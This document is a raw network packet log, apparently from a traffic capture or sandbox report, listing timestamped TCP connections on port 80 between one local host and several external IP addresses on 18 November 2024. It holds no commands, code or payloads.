                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.752089977 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.757738113 CET805016118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.757812023 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.773017883 CET5016380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.778011084 CET805016344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.778083086 CET5016380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.779048920 CET5016380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.779067993 CET5016380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.783938885 CET805016344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.783951998 CET805016344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.445240974 CET805016344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.462218046 CET5016380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.467798948 CET805016344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.468246937 CET5016380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.521538019 CET5016480192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.526823997 CET805016472.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.529735088 CET5016480192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.542838097 CET5016480192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.542839050 CET5016480192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.548103094 CET805016472.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.548115015 CET805016472.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.571151972 CET805016254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.576188087 CET5016280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.581943035 CET805016254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.584614992 CET5016280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.623485088 CET5016580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.628379107 CET805016518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.628885031 CET5016580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.640016079 CET5016580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.641299963 CET5016580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.644983053 CET805016518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.646163940 CET805016518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.253731012 CET805016472.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.257749081 CET5016480192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.277040958 CET5016480192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.281913996 CET805016472.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.290482044 CET5016680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.295502901 CET805016672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.295579910 CET5016680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.296243906 CET5016680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.296266079 CET5016680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.301116943 CET805016672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.301167011 CET805016672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.471596003 CET805016518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.471982002 CET5016580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.477317095 CET805016518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.479348898 CET5016580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.500622034 CET5016780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.505661011 CET805016718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.510099888 CET5016780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.510099888 CET5016780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.510099888 CET5016780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.515016079 CET805016718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.515094042 CET805016718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.969419956 CET805016672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.972585917 CET5016680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.972637892 CET5016680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.977653027 CET805016672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.986052990 CET5016880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.991069078 CET805016844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.992357969 CET5016880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.992435932 CET5016880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.992460966 CET5016880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.997263908 CET805016844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.997277975 CET805016844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.666948080 CET805016844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.667243958 CET5016880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.672444105 CET805016844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.672624111 CET5016880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.683201075 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.688142061 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.688216925 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.688395023 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.688395023 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.693236113 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.693248987 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.981956959 CET805016718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.982151985 CET5016780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.987440109 CET805016718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.987895966 CET5016780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.997688055 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.003027916 CET805017047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.003199100 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.003319979 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.003319979 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.008280993 CET805017047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.008299112 CET805017047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.503711939 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.505589008 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.510639906 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.510719061 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.517278910 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.517304897 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.522135973 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.522176027 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.130213976 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.130423069 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.135930061 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.136014938 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.143325090 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.148475885 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.148614883 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.148765087 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.148782969 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.153587103 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.153614044 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.838728905 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.839075089 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.844985962 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.845048904 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.851953983 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.856913090 CET8050173172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.856993914 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.857065916 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.857079029 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.862067938 CET8050173172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.862080097 CET8050173172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.980561972 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.980956078 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.986433029 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.986504078 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.993974924 CET5017480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.998956919 CET805017444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.999026060 CET5017480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.999140978 CET5017480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.999162912 CET5017480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.004722118 CET805017444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.004734039 CET805017444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.521884918 CET8050173172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.522120953 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.522120953 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.523746014 CET5017580192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.527270079 CET8050173172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.529005051 CET8050175172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.529104948 CET5017580192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.529208899 CET5017580192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.529227018 CET5017580192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.534287930 CET8050175172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.534302950 CET8050175172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.663105965 CET805017444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.663475990 CET5017480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.669141054 CET805017444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.669230938 CET5017480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.677025080 CET5017680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.681961060 CET805017644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.682054043 CET5017680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.682195902 CET5017680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.682219982 CET5017680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.686960936 CET805017644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.687022924 CET805017644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.196296930 CET8050175172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.196391106 CET5017580192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.196445942 CET5017580192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.201385021 CET8050175172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.271668911 CET5017780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.276740074 CET805017754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.276880026 CET5017780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.276942968 CET5017780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.276942968 CET5017780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.281846046 CET805017754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.281949043 CET805017754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.353188038 CET805017644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.354288101 CET5017680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.359791994 CET805017644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.359865904 CET5017680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.511159897 CET5017880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.516218901 CET805017818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.516318083 CET5017880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.519844055 CET5017880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.519875050 CET5017880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.524801016 CET805017818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.524831057 CET805017818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.127499104 CET805017754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.127845049 CET5017780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.134042025 CET805017754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.134123087 CET5017780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.141192913 CET5017980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.146265030 CET805017944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.146378040 CET5017980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.146498919 CET5017980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.146529913 CET5017980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.151413918 CET805017944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.151438951 CET805017944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.449769020 CET5017880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.453109980 CET5018080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.458808899 CET805018018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.458911896 CET5018080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.459036112 CET5018080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.459068060 CET5018080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.465082884 CET805018018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.465095043 CET805018018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.840703964 CET805017944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.841981888 CET5017980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.847259998 CET805017944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.847345114 CET5017980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.858496904 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.863492966 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.863675117 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.863823891 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.863823891 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.868697882 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.868724108 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.703841925 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.704411030 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.709736109 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.709834099 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.726866961 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.732564926 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.732641935 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.732754946 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.732779980 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.738445997 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.738457918 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.914818048 CET805018018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.926232100 CET5018080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.931683064 CET805018018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.931888103 CET5018080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.940798044 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.945657969 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.945842028 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.946000099 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.946026087 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.950884104 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.950896025 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.566540003 CET805018234.211.97.45192.168.2.10
